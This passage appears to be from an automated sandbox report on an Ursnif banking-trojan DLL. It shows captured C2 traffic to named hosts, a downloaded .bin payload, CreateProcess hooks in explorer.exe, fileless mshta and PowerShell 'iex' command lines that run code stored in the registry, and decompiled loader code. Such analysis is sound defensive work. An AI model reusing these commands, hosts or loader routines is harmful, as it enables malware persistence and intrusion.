                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: gtr.antoinfer.com
                              Connection: Keep-Alive
                              Jul 5, 2021 16:52:54.221350908 CEST | 2098 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:52:54 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Content-Encoding: gzip


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              4 | 192.168.2.5 | 49722 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 5, 2021 16:52:56.212973118 CEST | 2099 | OUT | GET /TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC5C/QMacbN7bi5gg4i/EPDpjwjNeqvxB8nx8goUN/7UScKdA3erCdyZnr/M1mYt7N44_2BCZB/z_2BQHKBZE3I76X4pk/LLUxigZ_2/FKtPJihoxkrQplteHpxJ/SQ5O5MOBE3EqfyedXsa/WMc6NwZF0braqCo_2FtHND/MeZCuTIpsRPeP/oRY2gUKx/_2BWnIG4Butzcab_2F67iqF/5L_2FfljiF/BmcXquDrczHDDG7sB/8E2Nz3hVUHpI/Iejf3l0Gse2/15LRCzp_2Bw/0DMy HTTP/1.1
                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                              Accept-Language: en-US
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Accept-Encoding: gzip, deflate
                              Host: gtr.antoinfer.com
                              Connection: Keep-Alive
                              Jul 5, 2021 16:52:57.141469002 CEST | 2100 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:52:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Content-Encoding: gzip


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              5 | 192.168.2.5 | 49730 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 5, 2021 16:53:33.216042042 CEST | 5925 | OUT | GET /kXu9tnPyh7IrxOnM_/2F5RL9McC0pC/V4JAp24MS7Z/JdKAzMH5afqP6U/5QKmnqIf4ji_2F0bYULim/Ln9m9S8CJYQHSAL8/9V4ln6b18wizYxs/lBvgnWHKscbAmpSE6F/UvyDHh12X/4KiHWavyPolIq4enzVWO/gZBgK_2BixX_2FpKOLN/j_2FfrEitBIUH8MDLOcNHJ/NhB576j_2Fx2n/eQ5OwroG/raMZRrL38_2FMqHXUW7maRX/ilf2Nc3TMF/dkY1WHkQs6cMiRoJ2/AWmEChw_2BA5/L5BFJV5SVgy/cNqd1hVvvZotyw/XPfvzeOgszjC/s HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                              Host: todo.faroin.at
                              Jul 5, 2021 16:53:34.131033897 CEST | 5934 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:53:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              6 | 192.168.2.5 | 49732 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 5, 2021 16:53:34.400011063 CEST | 5937 | OUT | POST /xJvow4_2/BJDMWjUnNijevmUW57WQQAD/EfF5Sspcyc/NJzdVTwdvpiYxkuku/nPGWvkA08XkQ/vBCHroC_2FE/9zehC8tkQdIdvs/O6XnkCJmSqv_2BmOlhbVu/HQOKlqimRyOan0Iq/gsEUxPO_2FhQGh0/jcvQ1wIS8Gsr9_2FfD/7E8mUZJ_2/BsH5YpBp8iAwhSj0WpLx/lHUKRpbxx3m_2BkZ1XY/A4clpRwWuRrbu_2BeomIJB/3Z5OAlfx3ZfTa/Zr5HnaAB/X29Vmpecpgs5PpmOqAd16fZ/L2jQuizAg_/2BSqqpGpXSe3rgahN/25lGwyN_2BXg/x HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                              Content-Length: 2
                              Host: todo.faroin.at
                              Jul 5, 2021 16:53:34.400017977 CEST | 5937 | OUT | Data Raw: 0d 0a
                              Data Ascii:
                              Jul 5, 2021 16:53:35.373759031 CEST | 5945 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:53:35 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              7 | 192.168.2.5 | 49734 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 5, 2021 16:53:35.638648987 CEST | 5946 | OUT | GET /6g7Xxs_2FcViNEvb/eUtlbGrmJOFyKjq/4FN1_2BKuLEoXjCSjf/rOtT7yIKe/XRB6VT8HCmGKCo9CPKHU/Y1tIeEDJ_2FZ5yl_2FC/3CWd28J10mPHAD4tnrT0eQ/4O_2BGRTBNWA2/fqx1qdU0/QI6EnaEphgC1mUE1Thrm53Z/ztU91Ji5Ak/31pVhif7ltLzOz9wa/PTfZf7fPEDoP/uPtRBBL_2F_/2FyHjGxoZIO3t9/kK4G4Vnymr0EDYoDEeLP8/HOyGGLeAWlRehWGS/nV7QbBb2S9gvK76/W7SlcXxU8wsH_2FGY1/v4Zp7Lft8CnCAMr/yLw HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                              Host: todo.faroin.at
                              Jul 5, 2021 16:53:36.563668966 CEST | 5947 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:53:36 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 138896
                              Connection: close
                              Pragma: public
                              Accept-Ranges: bytes
                              Expires: 0
                              Cache-Control: must-revalidate, post-check=0, pre-check=0
                              Content-Disposition: attachment; filename="60e31cf05e29a.bin"
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff


                              Code Manipulations

                              User Modules

                              Hook Summary

                              Function Name | Hook Type | Active in Processes
                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | explorer.exe
                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | explorer.exe
                              CreateProcessAsUserW | EAT | explorer.exe
                              CreateProcessAsUserW | INLINE | explorer.exe
                              CreateProcessW | EAT | explorer.exe
                              CreateProcessW | INLINE | explorer.exe
                              CreateProcessA | EAT | explorer.exe
                              CreateProcessA | INLINE | explorer.exe

                              Processes

                              Process: explorer.exe, Module: WININET.dll
                              Function Name | Hook Type | New Data
                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFA9B335200
                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 3B9EF98
                              Process: explorer.exe, Module: user32.dll
                              Function Name | Hook Type | New Data
                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFA9B335200
                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 3B9EF98
                              Process: explorer.exe, Module: KERNEL32.DLL
                              Function Name | Hook Type | New Data
                              CreateProcessAsUserW | EAT | 7FFA9B33521C
                              CreateProcessAsUserW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                              CreateProcessW | EAT | 7FFA9B335200
                              CreateProcessW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                              CreateProcessA | EAT | 7FFA9B33520E
                              CreateProcessA | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00

                              System Behavior

                              General

                              Start time:16:51:08
                              Start date:05/07/2021
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe 'C:\Users\user\Desktop\3a94.dll'
                              Imagebase:0x100000
                              File size:116736 bytes
                              MD5 hash:542795ADF7CC08EFCF675D65310596E8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:16:51:09
                              Start date:05/07/2021
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
                              Imagebase:0x150000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:16:51:09
                              Start date:05/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\3a94.dll,Seasonthing
                              Imagebase:0x2d0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:16:51:09
                              Start date:05/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
                              Imagebase:0x2d0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Start time:16:51:13
                              Start date:05/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\3a94.dll,Seatforce
                              Imagebase:0x2d0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:16:51:18
                              Start date:05/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\3a94.dll,Spaceclose
                              Imagebase:0x2d0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:16:51:23
                              Start date:05/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\3a94.dll,Time
                              Imagebase:0x2d0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:16:52:43
                              Start date:05/07/2021
                              Path:C:\Program Files\internet explorer\iexplore.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                              Imagebase:0x7ff703480000
                              File size:823560 bytes
                              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:16:52:43
                              Start date:05/07/2021
                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17410 /prefetch:2
                              Imagebase:0xe20000
                              File size:822536 bytes
                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:16:52:48
                              Start date:05/07/2021
                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17422 /prefetch:2
                              Imagebase:0xe20000
                              File size:822536 bytes
                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:16:52:55
                              Start date:05/07/2021
                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17428 /prefetch:2
                              Imagebase:0xe20000
                              File size:822536 bytes
                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:16:53:02
                              Start date:05/07/2021
                              Path:C:\Windows\System32\mshta.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                              Imagebase:0x7ff71e630000
                              File size:14848 bytes
                              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:16:53:05
                              Start date:05/07/2021
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                              Imagebase:0x7ff617cb0000
                              File size:447488 bytes
                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              General

                              Start time:16:53:06
                              Start date:05/07/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7ecfc0000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Disassembly

                              Code Analysis

                                Executed Functions

                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,00000995,00003000,00000040,00000995,6DDCE250), ref: 6DDCE8BE
                                • VirtualAlloc.KERNEL32(00000000,0000006C,00003000,00000040,6DDCE2B3), ref: 6DDCE8F5
                                • VirtualAlloc.KERNEL32(00000000,0000E3F3,00003000,00000040), ref: 6DDCE955
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DDCE98B
                                • VirtualProtect.KERNEL32(6DD40000,00000000,00000004,6DDCE7E0), ref: 6DDCEA90
                                • VirtualProtect.KERNEL32(6DD40000,00001000,00000004,6DDCE7E0), ref: 6DDCEAB7
                                • VirtualProtect.KERNEL32(00000000,?,00000002,6DDCE7E0), ref: 6DDCEB84
                                • VirtualProtect.KERNEL32(00000000,?,00000002,6DDCE7E0,?), ref: 6DDCEBDA
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DDCEBF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.495143690.000000006DDCE000.00000040.00020000.sdmp, Offset: 6DDCE000, based on PE: false
                                Similarity
                                • API ID: Virtual$Protect$Alloc$Free
                                • String ID:
                                • API String ID: 2574235972-0
                                • Opcode ID: c0946dfdec6311ad968fb05df371b2da3969ec27e83de0aba38451b992102b3d
                                • Instruction ID: 71c115430c3b3462b936112830475373405685f66557232930530127c1819d76
                                • Opcode Fuzzy Hash: c0946dfdec6311ad968fb05df371b2da3969ec27e83de0aba38451b992102b3d
                                • Instruction Fuzzy Hash: 55D160B2500502DFDB26DF44C8A1B5277BAFF48312F194194ED0A9F7EAD770A822CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 69%
                                			E6DD41144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                				intOrPtr _v12;
                                				struct _FILETIME* _v16;
                                				short _v60;
                                				struct _FILETIME* _t14;
                                				intOrPtr _t15;
                                				long _t18;
                                				void* _t19;
                                				void* _t22;
                                				intOrPtr _t31;
                                				long _t32;
                                				void* _t34;
                                
                                				_t31 = __edx;
                                				_t14 =  &_v16;
                                				GetSystemTimeAsFileTime(_t14);
                                				_push(0x192);
                                				_push(0x54d38000);
                                				_push(_v12);
                                				_push(_v16);
                                				L6DD42210();
                                				_push(_t14);
                                				_v16 = _t14;
                                				_t15 =  *0x6dd441d0;
                                				_push(_t15 + 0x6dd4505e);
                                				_push(_t15 + 0x6dd45054);
                                				_push(0x16);
                                				_push( &_v60);
                                				_v12 = _t31;
                                				L6DD4220A();
                                				_t18 = _a4;
                                				if(_t18 == 0) {
                                					_t18 = 0x1000;
                                				}
                                				_t19 = CreateFileMappingW(0xffffffff, 0x6dd441c0, 4, 0, _t18,  &_v60); // executed
                                				_t34 = _t19;
                                				if(_t34 == 0) {
                                					_t32 = GetLastError();
                                				} else {
                                					if(_a4 != 0 || GetLastError() == 0xb7) {
                                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                						if(_t22 == 0) {
                                							_t32 = GetLastError();
                                							if(_t32 != 0) {
                                								goto L9;
                                							}
                                						} else {
                                							 *_a8 = _t34;
                                							 *_a12 = _t22;
                                							_t32 = 0;
                                						}
                                					} else {
                                						_t32 = 2;
                                						L9:
                                						CloseHandle(_t34);
                                					}
                                				}
                                				return _t32;
                                			}















                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A,?,?), ref: 6DD41151
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6DD41167
                                • _snwprintf.NTDLL ref: 6DD4118C
                                • CreateFileMappingW.KERNELBASE(000000FF,6DD441C0,00000004,00000000,?,?), ref: 6DD411B1
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A,?), ref: 6DD411C8
                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6DD411DC
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A,?), ref: 6DD411F4
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A), ref: 6DD411FD
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A,?), ref: 6DD41205
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1724014008-0
                                • Opcode ID: 817a7e76302b91d36353824b75ffa31bd3623425a150c20b17c595c23a18eeb9
                                • Instruction ID: 84863663975d650d279791ec4d284cdc5aac01551be7728b7134590b00ade6e8
                                • Opcode Fuzzy Hash: 817a7e76302b91d36353824b75ffa31bd3623425a150c20b17c595c23a18eeb9
                                • Instruction Fuzzy Hash: 49217FB2A80109BFEB11BF98CC85FAE7BB8EB4A354F118225F621D7141D77099958B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 72%
                                			E6DD41B9C(intOrPtr* __eax, void** _a4) {
                                				int _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* _v24;
                                				int _v28;
                                				int _v32;
                                				intOrPtr _v36;
                                				int _v40;
                                				int _v44;
                                				void* _v48;
                                				void* __esi;
                                				long _t34;
                                				void* _t39;
                                				void* _t47;
                                				intOrPtr* _t48;
                                
                                				_t48 = __eax;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v24 =  *((intOrPtr*)(__eax + 4));
                                				_v16 = 0;
                                				_v12 = 0;
                                				_v48 = 0x18;
                                				_v44 = 0;
                                				_v36 = 0x40;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v28 = 0;
                                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                				if(_t34 < 0) {
                                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                				} else {
                                					 *_t48 = _v16;
                                					_t39 = E6DD41EC7(_t48,  &_v12); // executed
                                					_t47 = _t39;
                                					if(_t47 != 0) {
                                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                					} else {
                                						memset(_v12, 0, _v24);
                                						 *_a4 = _v12;
                                					}
                                				}
                                				return _t47;
                                			}



















                                APIs
                                • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 6DD41BF9
                                  • Part of subcall function 6DD41EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6DD41C0E,00000002,00000000,?,?,00000000,?,?,6DD41C0E,00000000), ref: 6DD41EF4
                                • memset.NTDLL ref: 6DD41C1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: Section$CreateViewmemset
                                • String ID: @
                                • API String ID: 2533685722-2766056989
                                • Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
                                • Instruction ID: 8128e45baf53fcd79e9aa7c1f6f4515594cd3e8f86d51b3ca90c7fa89ba53e54
                                • Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
                                • Instruction Fuzzy Hash: 172108B6D0020DAFDB01DFA9C9849DEFBB9FB48354F108829E615F3210D735AA558B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E6DD41E8A(void* __ecx) {
                                				char _v8;
                                				signed short _t7;
                                
                                				_v8 = _v8 & 0x00000000;
                                				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
                                				if(_t7 == 0) {
                                					__imp__GetSystemDefaultUILanguage();
                                					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                				}
                                				return _v8;
                                			}






                                APIs
                                • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6DD41B27,?,6DD41CE6,?,00000000,00000000,?,?,?,6DD41CE6), ref: 6DD41E9F
                                • GetSystemDefaultUILanguage.KERNEL32(?,?,6DD41B27,?,6DD41CE6,?,00000000,00000000,?,?,?,6DD41CE6), ref: 6DD41EA9
                                • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6DD41B27,?,6DD41CE6,?,00000000,00000000,?,?,?,6DD41CE6), ref: 6DD41EBC
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: Language$DefaultInfoLocaleNameSystem
                                • String ID:
                                • API String ID: 3724080410-0
                                • Opcode ID: 3b3832208ed01aad5e7084933df949055435368eff9c2742166a65af68dac72e
                                • Instruction ID: f3180d258e9e98a478726a95a50874f5195f9caed70ee18f898b903d718108dd
                                • Opcode Fuzzy Hash: 3b3832208ed01aad5e7084933df949055435368eff9c2742166a65af68dac72e
                                • Instruction Fuzzy Hash: F1E04868680205F6E700FB918C06F7972B8970070AF504144F711D60C0D7749E049775
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E6DD41F7C(void* __edi, intOrPtr _a4) {
                                				signed int _v8;
                                				intOrPtr* _v12;
                                				_Unknown_base(*)()** _v16;
                                				signed int _v20;
                                				signed short _v24;
                                				struct HINSTANCE__* _v28;
                                				intOrPtr _t43;
                                				intOrPtr* _t45;
                                				intOrPtr _t46;
                                				struct HINSTANCE__* _t47;
                                				intOrPtr* _t49;
                                				intOrPtr _t50;
                                				signed short _t51;
                                				_Unknown_base(*)()* _t53;
                                				CHAR* _t54;
                                				_Unknown_base(*)()* _t55;
                                				void* _t58;
                                				signed int _t59;
                                				_Unknown_base(*)()* _t60;
                                				intOrPtr _t61;
                                				intOrPtr _t65;
                                				signed int _t68;
                                				void* _t69;
                                				CHAR* _t71;
                                				signed short* _t73;
                                
                                				_t69 = __edi;
                                				_v20 = _v20 & 0x00000000;
                                				_t59 =  *0x6dd441cc;
                                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                				if(_t43 != 0) {
                                					_t45 = _t43 + __edi;
                                					_v12 = _t45;
                                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                					if(_t46 != 0) {
                                						while(1) {
                                							_t71 = _t46 + _t69;
                                							_t47 = LoadLibraryA(_t71); // executed
                                							_v28 = _t47;
                                							if(_t47 == 0) {
                                								break;
                                							}
                                							_v24 = _v24 & 0x00000000;
                                							 *_t71 = _t59 - 0x63699bc3;
                                							_t49 = _v12;
                                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                							_t50 =  *_t49;
                                							if(_t50 != 0) {
                                								L6:
                                								_t73 = _t50 + _t69;
                                								_v16 = _t61 + _t69;
                                								while(1) {
                                									_t51 =  *_t73;
                                									if(_t51 == 0) {
                                										break;
                                									}
                                									if(__eflags < 0) {
                                										__eflags = _t51 - _t69;
                                										if(_t51 < _t69) {
                                											L12:
                                											_t21 =  &_v8;
                                											 *_t21 = _v8 & 0x00000000;
                                											__eflags =  *_t21;
                                											_v24 =  *_t73 & 0x0000ffff;
                                										} else {
                                											_t65 = _a4;
